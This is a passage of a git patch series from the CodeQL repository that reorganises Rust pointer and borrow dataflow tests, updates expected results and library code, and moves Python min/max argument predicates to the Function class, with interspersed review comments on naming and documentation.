} | semmle.label | { ... } | -| main.rs:77:15:77:18 | self [MyNumber] | semmle.label | self [MyNumber] | -| main.rs:78:13:78:38 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | -| main.rs:78:32:78:37 | number | semmle.label | number | -| main.rs:82:19:82:23 | SelfParam [&ref, MyNumber] | semmle.label | SelfParam [&ref, MyNumber] | -| main.rs:82:33:86:5 | { ... } | semmle.label | { ... } | -| main.rs:83:15:83:18 | self [&ref, MyNumber] | semmle.label | self [&ref, MyNumber] | -| main.rs:84:13:84:39 | &... [&ref, MyNumber] | semmle.label | &... [&ref, MyNumber] | -| main.rs:84:14:84:39 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | -| main.rs:84:33:84:38 | number | semmle.label | number | -| main.rs:90:9:90:17 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | -| main.rs:90:21:90:50 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | -| main.rs:90:40:90:49 | source(...) | semmle.label | source(...) | -| main.rs:91:10:91:18 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | -| main.rs:91:10:91:30 | my_number.to_number(...) | semmle.label | my_number.to_number(...) | -| main.rs:100:9:100:17 | my_number [&ref, MyNumber] | semmle.label | my_number [&ref, MyNumber] | -| main.rs:100:21:100:51 | &... [&ref, MyNumber] | semmle.label | &... [&ref, MyNumber] | -| main.rs:100:22:100:51 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | -| main.rs:100:41:100:50 | source(...) | semmle.label | source(...) | -| main.rs:101:10:101:18 | my_number [&ref, MyNumber] | semmle.label | my_number [&ref, MyNumber] | -| main.rs:101:10:101:31 | my_number.get_number(...) | semmle.label | my_number.get_number(...) | -| main.rs:105:9:105:9 | a [&ref, tuple.0] | semmle.label | a [&ref, tuple.0] | -| main.rs:105:13:105:28 | &... [&ref, tuple.0] | semmle.label | &... 
[&ref, tuple.0] | -| main.rs:105:14:105:28 | TupleExpr [tuple.0] | semmle.label | TupleExpr [tuple.0] | -| main.rs:105:15:105:24 | source(...) | semmle.label | source(...) | -| main.rs:108:9:108:9 | b | semmle.label | b | -| main.rs:108:19:108:19 | a [&ref, tuple.0] | semmle.label | a [&ref, tuple.0] | -| main.rs:109:9:109:15 | &... [&ref, tuple.0] | semmle.label | &... [&ref, tuple.0] | -| main.rs:109:10:109:15 | TuplePat [tuple.0] | semmle.label | TuplePat [tuple.0] | -| main.rs:109:11:109:11 | n | semmle.label | n | -| main.rs:111:10:111:10 | b | semmle.label | b | +| main.rs:17:13:17:13 | a | semmle.label | a | +| main.rs:17:17:17:26 | source(...) | semmle.label | source(...) | +| main.rs:18:13:18:13 | b [&ref] | semmle.label | b [&ref] | +| main.rs:18:17:18:18 | &a [&ref] | semmle.label | &a [&ref] | +| main.rs:18:18:18:18 | a | semmle.label | a | +| main.rs:19:13:19:13 | c | semmle.label | c | +| main.rs:19:17:19:18 | * ... | semmle.label | * ... | +| main.rs:19:18:19:18 | b [&ref] | semmle.label | b [&ref] | +| main.rs:20:14:20:14 | c | semmle.label | c | +| main.rs:23:29:23:30 | &... [&ref] | semmle.label | &... [&ref] | +| main.rs:23:29:23:36 | ...: ... [&ref] | semmle.label | ...: ... [&ref] | +| main.rs:23:30:23:30 | n | semmle.label | n | +| main.rs:24:14:24:14 | n | semmle.label | n | +| main.rs:28:13:28:15 | val | semmle.label | val | +| main.rs:28:19:28:28 | source(...) | semmle.label | source(...) | +| main.rs:29:30:29:33 | &val [&ref] | semmle.label | &val [&ref] | +| main.rs:29:31:29:33 | val | semmle.label | val | +| main.rs:33:13:33:13 | a [&ref, tuple.0] | semmle.label | a [&ref, tuple.0] | +| main.rs:33:17:33:32 | &... [&ref, tuple.0] | semmle.label | &... [&ref, tuple.0] | +| main.rs:33:18:33:32 | TupleExpr [tuple.0] | semmle.label | TupleExpr [tuple.0] | +| main.rs:33:19:33:28 | source(...) | semmle.label | source(...) 
| +| main.rs:36:13:36:13 | b | semmle.label | b | +| main.rs:36:23:36:23 | a [&ref, tuple.0] | semmle.label | a [&ref, tuple.0] | +| main.rs:37:13:37:19 | &... [&ref, tuple.0] | semmle.label | &... [&ref, tuple.0] | +| main.rs:37:14:37:19 | TuplePat [tuple.0] | semmle.label | TuplePat [tuple.0] | +| main.rs:37:15:37:15 | n | semmle.label | n | +| main.rs:39:14:39:14 | b | semmle.label | b | +| main.rs:51:13:51:13 | a | semmle.label | a | +| main.rs:51:17:51:26 | source(...) | semmle.label | source(...) | +| main.rs:52:13:52:17 | ref p | semmle.label | ref p | +| main.rs:52:17:52:17 | p [&ref] | semmle.label | p [&ref] | +| main.rs:53:14:53:15 | * ... | semmle.label | * ... | +| main.rs:53:15:53:15 | p [&ref] | semmle.label | p [&ref] | +| main.rs:57:13:57:13 | a [Some] | semmle.label | a [Some] | +| main.rs:57:17:57:32 | Some(...) [Some] | semmle.label | Some(...) [Some] | +| main.rs:57:22:57:31 | source(...) | semmle.label | source(...) | +| main.rs:58:15:58:15 | a [Some] | semmle.label | a [Some] | +| main.rs:59:13:59:23 | Some(...) [Some] | semmle.label | Some(...) [Some] | +| main.rs:59:18:59:22 | ref p | semmle.label | ref p | +| main.rs:59:22:59:22 | p [&ref] | semmle.label | p [&ref] | +| main.rs:59:33:59:34 | * ... | semmle.label | * ... | +| main.rs:59:34:59:34 | p [&ref] | semmle.label | p [&ref] | +| main.rs:73:10:73:10 | [post] b [&ref] | semmle.label | [post] b [&ref] | +| main.rs:73:14:73:23 | source(...) | semmle.label | source(...) | +| main.rs:74:14:74:15 | * ... | semmle.label | * ... | +| main.rs:74:15:74:15 | b [&ref] | semmle.label | b [&ref] | +| main.rs:105:10:105:10 | [post] c [&ref] | semmle.label | [post] c [&ref] | +| main.rs:105:14:105:23 | source(...) | semmle.label | source(...) | +| main.rs:106:14:106:15 | * ... | semmle.label | * ... 
| +| main.rs:106:15:106:15 | c [&ref] | semmle.label | c [&ref] | +| main.rs:112:13:112:21 | ref mut a | semmle.label | ref mut a | +| main.rs:112:21:112:21 | a [&ref] | semmle.label | a [&ref] | +| main.rs:112:25:112:34 | source(...) | semmle.label | source(...) | +| main.rs:113:14:113:15 | * ... | semmle.label | * ... | +| main.rs:113:15:113:15 | a [&ref] | semmle.label | a [&ref] | +| main.rs:156:18:156:21 | SelfParam [MyNumber] | semmle.label | SelfParam [MyNumber] | +| main.rs:156:31:160:5 | { ... } | semmle.label | { ... } | +| main.rs:157:15:157:18 | self [MyNumber] | semmle.label | self [MyNumber] | +| main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:158:32:158:37 | number | semmle.label | number | +| main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | semmle.label | SelfParam [&ref, MyNumber] | +| main.rs:162:26:166:5 | { ... } | semmle.label | { ... } | +| main.rs:163:15:163:18 | self [&ref, MyNumber] | semmle.label | self [&ref, MyNumber] | +| main.rs:164:13:164:39 | &... [&ref, MyNumber] | semmle.label | &... [&ref, MyNumber] | +| main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:164:33:164:38 | number | semmle.label | number | +| main.rs:174:13:174:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:174:44:174:53 | source(...) | semmle.label | source(...) | +| main.rs:175:14:175:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:175:14:175:34 | my_number.to_number(...) | semmle.label | my_number.to_number(...) | +| main.rs:179:13:179:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:179:44:179:53 | source(...) | semmle.label | source(...) 
| +| main.rs:180:14:180:31 | ... .get(...) | semmle.label | ... .get(...) | +| main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | semmle.label | &my_number [&ref, MyNumber] | +| main.rs:180:16:180:24 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:200:16:200:26 | ...: ... [Return] [&ref] | semmle.label | ...: ... [Return] [&ref] | +| main.rs:200:29:200:38 | ...: i64 | semmle.label | ...: i64 | +| main.rs:201:10:201:10 | [post] n [&ref] | semmle.label | [post] n [&ref] | +| main.rs:201:14:201:18 | value | semmle.label | value | +| main.rs:210:17:210:17 | [post] p [&ref] | semmle.label | [post] p [&ref] | +| main.rs:210:20:210:29 | source(...) | semmle.label | source(...) | +| main.rs:211:14:211:15 | * ... | semmle.label | * ... | +| main.rs:211:15:211:15 | p [&ref] | semmle.label | p [&ref] | subpaths -| main.rs:91:10:91:18 | my_number [MyNumber] | main.rs:76:18:76:21 | SelfParam [MyNumber] | main.rs:76:31:80:5 | { ... } | main.rs:91:10:91:30 | my_number.to_number(...) | -| main.rs:101:10:101:18 | my_number [&ref, MyNumber] | main.rs:82:19:82:23 | SelfParam [&ref, MyNumber] | main.rs:82:33:86:5 | { ... } | main.rs:101:10:101:31 | my_number.get_number(...) | +| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:156:31:160:5 | { ... } | main.rs:175:14:175:34 | my_number.to_number(...) | +| main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:180:14:180:31 | ... .get(...) | +| main.rs:210:20:210:29 | source(...) | main.rs:200:29:200:38 | ...: i64 | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | main.rs:210:17:210:17 | [post] p [&ref] | testFailures #select -| main.rs:16:10:16:10 | c | main.rs:13:13:13:22 | source(...) | main.rs:16:10:16:10 | c | $@ | main.rs:13:13:13:22 | source(...) | source(...) | -| main.rs:32:10:32:11 | * ... | main.rs:31:10:31:19 | source(...) 
| main.rs:32:10:32:11 | * ... | $@ | main.rs:31:10:31:19 | source(...) | source(...) | -| main.rs:38:10:38:10 | n | main.rs:42:15:42:24 | source(...) | main.rs:38:10:38:10 | n | $@ | main.rs:42:15:42:24 | source(...) | source(...) | -| main.rs:52:14:52:15 | * ... | main.rs:50:17:50:26 | source(...) | main.rs:52:14:52:15 | * ... | $@ | main.rs:50:17:50:26 | source(...) | source(...) | -| main.rs:57:14:57:15 | * ... | main.rs:56:25:56:34 | source(...) | main.rs:57:14:57:15 | * ... | $@ | main.rs:56:25:56:34 | source(...) | source(...) | -| main.rs:65:33:65:34 | * ... | main.rs:63:22:63:31 | source(...) | main.rs:65:33:65:34 | * ... | $@ | main.rs:63:22:63:31 | source(...) | source(...) | -| main.rs:91:10:91:30 | my_number.to_number(...) | main.rs:90:40:90:49 | source(...) | main.rs:91:10:91:30 | my_number.to_number(...) | $@ | main.rs:90:40:90:49 | source(...) | source(...) | -| main.rs:101:10:101:31 | my_number.get_number(...) | main.rs:100:41:100:50 | source(...) | main.rs:101:10:101:31 | my_number.get_number(...) | $@ | main.rs:100:41:100:50 | source(...) | source(...) | -| main.rs:111:10:111:10 | b | main.rs:105:15:105:24 | source(...) | main.rs:111:10:111:10 | b | $@ | main.rs:105:15:105:24 | source(...) | source(...) | +| main.rs:20:14:20:14 | c | main.rs:17:17:17:26 | source(...) | main.rs:20:14:20:14 | c | $@ | main.rs:17:17:17:26 | source(...) | source(...) | +| main.rs:24:14:24:14 | n | main.rs:28:19:28:28 | source(...) | main.rs:24:14:24:14 | n | $@ | main.rs:28:19:28:28 | source(...) | source(...) | +| main.rs:39:14:39:14 | b | main.rs:33:19:33:28 | source(...) | main.rs:39:14:39:14 | b | $@ | main.rs:33:19:33:28 | source(...) | source(...) | +| main.rs:53:14:53:15 | * ... | main.rs:51:17:51:26 | source(...) | main.rs:53:14:53:15 | * ... | $@ | main.rs:51:17:51:26 | source(...) | source(...) | +| main.rs:59:33:59:34 | * ... | main.rs:57:22:57:31 | source(...) | main.rs:59:33:59:34 | * ... | $@ | main.rs:57:22:57:31 | source(...) | source(...) 
| +| main.rs:74:14:74:15 | * ... | main.rs:73:14:73:23 | source(...) | main.rs:74:14:74:15 | * ... | $@ | main.rs:73:14:73:23 | source(...) | source(...) | +| main.rs:106:14:106:15 | * ... | main.rs:105:14:105:23 | source(...) | main.rs:106:14:106:15 | * ... | $@ | main.rs:105:14:105:23 | source(...) | source(...) | +| main.rs:113:14:113:15 | * ... | main.rs:112:25:112:34 | source(...) | main.rs:113:14:113:15 | * ... | $@ | main.rs:112:25:112:34 | source(...) | source(...) | +| main.rs:175:14:175:34 | my_number.to_number(...) | main.rs:174:44:174:53 | source(...) | main.rs:175:14:175:34 | my_number.to_number(...) | $@ | main.rs:174:44:174:53 | source(...) | source(...) | +| main.rs:180:14:180:31 | ... .get(...) | main.rs:179:44:179:53 | source(...) | main.rs:180:14:180:31 | ... .get(...) | $@ | main.rs:179:44:179:53 | source(...) | source(...) | +| main.rs:211:14:211:15 | * ... | main.rs:210:20:210:29 | source(...) | main.rs:211:14:211:15 | * ... | $@ | main.rs:210:20:210:29 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/pointers/main.rs b/rust/ql/test/library-tests/dataflow/pointers/main.rs index d9d5a5298d25..6eb1e8b544d5 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/main.rs +++ b/rust/ql/test/library-tests/dataflow/pointers/main.rs 
@@ -9,49 +9,105 @@ fn sink(s: i64) { println!("{}", s); } -fn read_through_borrow() { - let a = source(21); - let b = &a; - let c = *b; - sink(c); // $ hasValueFlow=21 -} +// Intraprocedural tests involving immutable borrows +mod intraprocedural_immutable_borrows { + use super::{sink, source}; -fn write_through_borrow() { - let mut a = 1; - sink(a); - let b = &mut a; - *b = source(39); - sink(a); // $ MISSING: hasValueFlow=39 -} + pub fn read_through_borrow() { + let a = source(21); + let b = &a; + let c = *b; + sink(c); // $ hasValueFlow=21 + } -fn write_and_read_through_borrow() { - let mut a = 12; - let b = &mut a; - sink(*b); - *b = source(37); - sink(*b); // $ hasValueFlow=37 - *b = 0; - sink(*b); // now cleared -} + fn takes_borrowed_value(&n: &i64) { + sink(n); // $ hasValueFlow=83 + } -fn takes_borrowed_value(&n: &i64) { - sink(n); // $ hasValueFlow=83 -} + pub fn pass_borrowed_value() { + let val = source(83); + takes_borrowed_value(&val); + } -fn pass_borrowed_value() { - let val = source(83); - takes_borrowed_value(&val); -} + pub fn ref_nested_pattern_match() { + let a = &(source(23), 1); -mod test_ref_pattern { - use super::{sink, source}; + // Match "in order", reference pattern then tuple pattern + let b = match a { + &(n, _) => n, + }; + sink(b); // $ hasValueFlow=23 - pub fn read_through_ref() { + // Match "out of order", tuple pattern then deref pattern + let c = match a { + (n, _) => match n { + &i => i, + }, + }; + sink(c); // $ MISSING: hasValueFlow=23 + } + + pub fn read_through_ref_pattern() { let a = source(21); let ref p = a; sink(*p); // $ hasValueFlow=21 } + pub fn ref_pattern_in_match() { + let a = Some(source(17)); + match a { + Some(ref p) => sink(*p), // $ hasValueFlow=17 + None => (), + }; + } +} + +// Intraprocedural tests involving mutable borrows +mod intraprocedural_mutable_borrows { + use super::{sink, source}; + + pub fn write_and_read_through_borrow() { + let mut a = 12; + let b = &mut a; + sink(*b); + *b = source(37); + 
sink(*b); // $ hasValueFlow=37 + *b = 0; + sink(*b); // now cleared + } + + pub fn write_through_borrow() { + let mut a = 1; + sink(a); + let b = &mut a; + *b = source(39); + sink(a); // $ MISSING: hasValueFlow=39 + } + + pub fn write_borrow_directly() { + let mut a = 1; + sink(a); + *(&mut a) = source(87); + sink(a); // $ MISSING: hasValueFlow=87 + } + + pub fn clear_through_borrow() { + let mut to_be_cleared = source(34); + let p = &mut to_be_cleared; + *p = 0; + sink(to_be_cleared); // variable is cleared + } + + pub fn write_through_borrow_in_match(cond: bool) { + let mut a = 1; + let mut b = 2; + let c = if cond { &mut a } else { &mut b }; + *c = source(24); + sink(*c); // $ hasValueFlow=24 + sink(a); // $ MISSING: hasValueFlow=24 + sink(b); // $ MISSING: hasValueFlow=24 + } + pub fn write_through_ref_mut() { let ref mut a = source(78); sink(*a); // $ hasValueFlow=78 @@ -59,19 +115,43 @@ mod test_ref_pattern { sink(*a); // now cleared } - pub fn ref_pattern_in_match() { - let a = Some(source(17)); - let b = match a { - Some(ref p) => sink(*p), // $ hasValueFlow=17 - None => (), - }; + pub fn mutate_tuple() { + let mut t = (1, 2, 3); + sink(t.1); + let r = &mut t.1; + *r = source(48); + sink(t.1); // $ MISSING: hasValueFlow=48 + let r = &mut t.1; + *r = 0; + sink(t.1); // now cleared + } + + pub fn tuple_match_mut() { + let mut a = (0, 1); + sink(a.0); + sink(a.1); + match a { + (ref mut x, ref mut y) => { + *x = source(71); + *y = 2; + } + } + sink(a.0); // $ MISSING: hasValueFlow=71 + sink(a.1); } } +#[derive(Copy, Clone)] enum MyNumber { MyNumber(i64), } +fn to_number(m: MyNumber) -> i64 { + match m { + MyNumber::MyNumber(number) => number, + } +} + impl MyNumber { fn to_number(self) -> i64 { match self { 
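Review bot: `write_through_borrow_in_match` does not contain a `match`; the borrow is selected with `if cond { &mut a } else { &mut b }`, so the name misdescribes the case under test. Renaming it to something like `write_through_borrow_in_branch` (and updating its caller, which is outside this hunk) keeps the test list readable when results are compared against `inline-flow.expected`. A comment on the two `MISSING` lines would also help, e.g. `// only one of a/b is written at run time, but flow should be reported to both`, since the expectation for `sink(a)` and `sink(b)` is otherwise easy to misread.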
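Review bot: The new free function `to_number(m: MyNumber)` has the same name and body as the method `MyNumber::to_number` directly below it, and nothing in this hunk calls it or says which case it is meant to cover. A one-line comment such as `// Free-function counterpart of MyNumber::to_number, for tests that pass the value as an ordinary argument` (if that is the intent) would make the duplication deliberate. The same goes for the added `#[derive(Copy, Clone)]`: by-value calls now copy rather than move, which changes what the by-value tests exercise, so it deserves a short note on why it is needed. The `impl MyNumber` block continues outside the hunk.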
@@ -79,58 +159,129 @@ impl MyNumber { } } - fn get_number(&self) -> i64 { + fn get(&self) -> i64 { match self { &MyNumber::MyNumber(number) => number, } } } -fn through_self_in_method_no_borrow() { - let my_number = MyNumber::MyNumber(source(33)); - sink(my_number.to_number()); // $ hasValueFlow=33 -} +// Interprocedural tests involving immutable borrows +mod interprocedural_immutable_borrows { + use super::*; -fn through_self_in_method_implicit_borrow() { - let my_number = MyNumber::MyNumber(source(85)); - sink(my_number.get_number()); // $ MISSING: hasValueFlow=85 -} + pub fn through_self_in_method_no_borrow() { + let my_number = MyNumber::MyNumber(source(33)); + sink(my_number.to_number()); // $ hasValueFlow=33 + } + + pub fn through_self_in_method_explicit_borrow() { + let my_number = MyNumber::MyNumber(source(40)); + sink((&my_number).get()); // $ hasValueFlow=40 + } -fn through_self_in_method_explicit_borrow() { - let my_number = &MyNumber::MyNumber(source(40)); - sink(my_number.get_number()); // $ hasValueFlow=40 + pub fn through_self_in_method_implicit_borrow() { + let my_number = MyNumber::MyNumber(source(85)); + // Implicit borrow + sink(my_number.get()); // $ MISSING: hasValueFlow=85 + } + + pub fn through_self_in_method_implicit_deref() { + let my_number = &MyNumber::MyNumber(source(58)); + // Implicit dereference + sink(my_number.to_number()); // $ MISSING: hasValueFlow=58 + } } -fn ref_nested_pattern_match() { - let a = &(source(23), 1); - - // Match "in order", reference pattern then tuple pattern - let b = match a { - &(n, _) => n, - }; - sink(b); // $ hasValueFlow=23 - - // Match "out of order", tuple pattern then deref pattern - let c = match a { - (n, _) => match n { - &i => i, - }, - }; - sink(c); // $ MISSING: hasValueFlow=23 +// Interprocedural tests involving mutable borrows +mod interprocedural_mutable_borrows { + use super::*; + + fn set_int(n: &mut i64, value: i64) { + *n = value; + } + + pub fn mutates_existing_borrow() { + // Passing an 
already borrowed value to a function and then reading from + // the same borrow. + let mut n = 0; + let p = &mut n; + sink(*p); + set_int(p, source(38)); + sink(*p); // $ hasValueFlow=38 + } + + pub fn mutate_primitive_through_function() { + // Borrowing at the call and then reading from the unborrowed variable. + let mut n = 0; + sink(n); + set_int(&mut n, source(55)); + sink(n); // $ MISSING: hasValueFlow=55 + } + + impl MyNumber { + fn set(&mut self, number: i64) { + *self = MyNumber::MyNumber(number); + } + } + + fn set_number(n: &mut MyNumber, number: i64) { + *n = MyNumber::MyNumber(number); + } + + pub fn mutate_enum_through_function() { + let mut my_number = MyNumber::MyNumber(0); + set_number(&mut my_number, source(64)); + sink(my_number.get()); // $ MISSING: hasValueFlow=64 + set_number(&mut my_number, 0); + sink(my_number.get()); // now cleared + } + + pub fn mutate_enum_through_method_implicit_borrow() { + let mut my_number = MyNumber::MyNumber(0); + // Implicit borrow. + my_number.set(source(45)); + sink(to_number(my_number)); // $ MISSING: hasValueFlow=45 + my_number.set(0); + sink(to_number(my_number)); // now cleared + } + + pub fn mutate_enum_through_method_explicit_borrow() { + let mut my_number = MyNumber::MyNumber(0); + // Explicit borrow. 
+ (&mut my_number).set(source(99)); + sink(to_number(my_number)); // $ MISSING: hasValueFlow=99 + (&mut my_number).set(0); + sink(to_number(my_number)); // now cleared + } } -use test_ref_pattern::*; +use interprocedural_immutable_borrows::*; +use interprocedural_mutable_borrows::*; +use intraprocedural_immutable_borrows::*; +use intraprocedural_mutable_borrows::*; fn main() { read_through_borrow(); write_through_borrow(); + write_borrow_directly(); + clear_through_borrow(); + write_through_borrow_in_match(true); write_and_read_through_borrow(); pass_borrowed_value(); through_self_in_method_no_borrow(); - through_self_in_method_implicit_borrow(); through_self_in_method_explicit_borrow(); + through_self_in_method_implicit_borrow(); + through_self_in_method_implicit_deref(); + mutates_existing_borrow(); + mutate_primitive_through_function(); + mutate_enum_through_function(); + mutate_enum_through_method_implicit_borrow(); + mutate_enum_through_method_explicit_borrow(); ref_nested_pattern_match(); - read_through_ref(); + read_through_ref_pattern(); write_through_ref_mut(); ref_pattern_in_match(); + mutate_tuple(); + tuple_match_mut(); } From 3956a1fea8d1c08ab7822487f5aa0cbf33867b60 Mon Sep 17 00:00:00 2001 
From: Taus Date: Wed, 26 Feb 2025 13:33:16 +0000 Subject: [PATCH 036/892] Python: Move min/maxParameter methods to `Function` These seem generally useful outside of points-to, and so it might be better to add them to the `Function` class instead. I took the liberty of renaming these to say `Arguments` rather than `Parameters`, as this is more in line with the nomenclature that we're using elsewhere. (The internal points-to methods retain the old names.) I'm somewhat ambivalent about the behaviour of `getMaxParameters` on functions with `*varargs`. The hard-coded `INT_MAX` return value is somewhat awkward, but the alternative (to only have the predicate defined when a specific maximum exists) seems like it would potentially cause a lot of headaches. --- python/ql/lib/semmle/python/Function.qll | 12 ++++++++++++ .../ql/lib/semmle/python/objects/ObjectAPI.qll | 16 ++-------------- 2 files changed, 14 insertions(+), 14 deletions(-) diff --git a/python/ql/lib/semmle/python/Function.qll b/python/ql/lib/semmle/python/Function.qll index c3d5f7c801ea..1687af0038a3 100644 --- a/python/ql/lib/semmle/python/Function.qll +++ b/python/ql/lib/semmle/python/Function.qll @@ -163,6 +163,18 @@ class Function extends Function_, Scope, AstNode { ret.getValue() = result.getNode() ) } + + /** Gets the minimum number of positional arguments that can be correctly passed to this function. */ + int getMinArguments() { + result = count(this.getAnArg()) - count(this.getDefinition().getArgs().getADefault()) + } + + /** Gets the maximum number of positional arguments that can be correctly passed to this function. */ + int getMaxArguments() { + if exists(this.getVararg()) + then result = 2147483647 // INT_MAX + else result = count(this.getAnArg()) + } } /** A def statement. Note that FunctionDef extends Assign as a function definition binds the newly created function */ 
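Review bot: The QLDoc on `getMaxArguments` does not mention that the predicate returns the sentinel `2147483647` for functions with `*varargs`, although the commit message discusses this as a deliberate choice. A caller of the now-public `Function` API who reads only the doc comment could treat the result as a real parameter count. I would extend the comment to something like `/** Gets the maximum number of positional arguments that can be correctly passed to this function, or 2147483647 (INT_MAX) if it accepts *varargs. */`. The `Function` class body continues outside this hunk.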
diff --git a/python/ql/lib/semmle/python/objects/ObjectAPI.qll b/python/ql/lib/semmle/python/objects/ObjectAPI.qll index dc1363b2ebe2..ed480cefc97d 100644 --- a/python/ql/lib/semmle/python/objects/ObjectAPI.qll +++ b/python/ql/lib/semmle/python/objects/ObjectAPI.qll @@ -738,21 +738,9 @@ class PythonFunctionValue extends FunctionValue { else result = "function " + this.getQualifiedName() } - override int minParameters() { - exists(Function f | - f = this.getScope() and - result = count(f.getAnArg()) - count(f.getDefinition().getArgs().getADefault()) - ) - } + override int minParameters() { result = this.getScope().getMinArguments() } - override int maxParameters() { - exists(Function f | - f = this.getScope() and - if exists(f.getVararg()) - then result = 2147483647 // INT_MAX - else result = count(f.getAnArg()) - ) - } + override int maxParameters() { result = this.getScope().getMaxArguments() } /** Gets a control flow node corresponding to a return statement in this function */ ControlFlowNode getAReturnedNode() { result = this.getScope().getAReturnValueFlowNode() } From 83cdcdbb0b27ae4a31ff2e2dc8626c1c7dee7ae6 Mon Sep 17 00:00:00 2001 From: Taus Date: Wed, 26 Feb 2025 13:53:49 +0000 Subject: [PATCH 037/892] Python: Add change note --- ...025-02-26-add-get-min-max-parameters-to-function-class.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 python/ql/lib/change-notes/2025-02-26-add-get-min-max-parameters-to-function-class.md diff --git a/python/ql/lib/change-notes/2025-02-26-add-get-min-max-parameters-to-function-class.md b/python/ql/lib/change-notes/2025-02-26-add-get-min-max-parameters-to-function-class.md new file mode 100644 index 000000000000..f35b0981bafc --- /dev/null +++ b/python/ql/lib/change-notes/2025-02-26-add-get-min-max-parameters-to-function-class.md 
@@ -0,0 +1,5 @@ +--- +category: minorAnalysis +--- + +- Added the methods `getMinArguments` and `getMaxArguments` to the `Function` class. These return the minimum and maximum positional arguments that the given function accepts. From 476fef49dab2b9df206b7f80241d13dd3943ce45 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 26 Feb 2025 14:49:59 +0100 Subject: [PATCH 038/892] Rust: Allow SSA and some data flow for mutable borrows --- .../dataflow/internal/DataFlowConsistency.qll | 8 +- .../rust/dataflow/internal/DataFlowImpl.qll | 140 ++++++++++++++-- .../codeql/rust/dataflow/internal/SsaImpl.qll | 35 ++-- .../dataflow/global/inline-flow.expected | 59 +++---- .../dataflow/global/viableCallable.expected | 32 ++-- .../dataflow/local/DataFlowStep.expected | 151 ++++++++++++++++++ .../dataflow/local/inline-flow.expected | 30 ++-- .../test/library-tests/dataflow/local/main.rs | 2 +- .../dataflow/modeled/inline-flow.expected | 36 ++--- .../dataflow/pointers/inline-flow.expected | 147 ++++++++++++++++- .../library-tests/dataflow/pointers/main.rs | 22 +-- .../library-tests/dataflow/sources/test.rs | 2 +- .../strings/inline-taint-flow.expected | 4 +- .../test/library-tests/variables/Ssa.expected | 77 +++++++-- rust/ql/test/library-tests/variables/Ssa.ql | 2 - .../security/CWE-089/SqlInjection.expected | 36 +++-- .../test/query-tests/security/CWE-089/sqlx.rs | 4 +- .../CWE-312/CleartextLogging.expected | 20 +-- .../CaptureSummaryModels.expected | 9 ++ 19 files changed, 621 insertions(+), 195 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowConsistency.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowConsistency.qll index 18d19fa7bd10..0cabde4ba1fa 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowConsistency.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowConsistency.qll 
@@ -11,7 +11,13 @@ private module Input implements InputSig { not exists(n.asExpr().getLocation()) } - predicate postWithInFlowExclude(RustDataFlow::Node n) { n instanceof Node::FlowSummaryNode } + predicate postWithInFlowExclude(RustDataFlow::Node n) { + n instanceof Node::FlowSummaryNode + or + // We allow flow into post-update node for receiver expressions (from the + // synthetic post receiever node). + n.(Node::PostUpdateNode).getPreUpdateNode().asExpr() = any(Node::ReceiverNode r).getReceiver() + } predicate missingLocationExclude(RustDataFlow::Node n) { not exists(n.asExpr().getLocation()) } } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 6d237d786beb..aacdf621ecee 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -4,6 +4,7 @@ private import codeql.util.Void private import codeql.util.Unit +private import codeql.util.Boolean private import codeql.dataflow.DataFlow private import codeql.dataflow.internal.DataFlowImpl private import rust @@ -96,6 +97,8 @@ final class ParameterPosition extends TParameterPosition { /** Gets the underlying integer position, if any. */ int getPosition() { this = TPositionalParameterPosition(result) } + predicate hasPosition() { exists(this.getPosition()) } + /** Holds if this position represents the `self` position. */ predicate isSelf() { this = TSelfParameterPosition() } 
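Review bot: The comment added in `postWithInFlowExclude` misspells "receiver" as "receiever" (`synthetic post receiever node`). The same misspelling appears in the comment inside `implicitBorrow` in the DataFlowImpl.qll hunk at `@@ -998,6 +1049,23 @@`. Both should read `receiver`, so that a text search for the receiver-node logic finds these comments.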
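Review bot: The new `hasPosition()` predicate on `ParameterPosition` has no QLDoc, while its neighbours `getPosition()` and `isSelf()` in the same hunk both carry one. Suggest adding `/** Holds if this position has an underlying integer position. */` above it, which follows directly from its body `exists(this.getPosition())`. The class continues outside the hunk.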
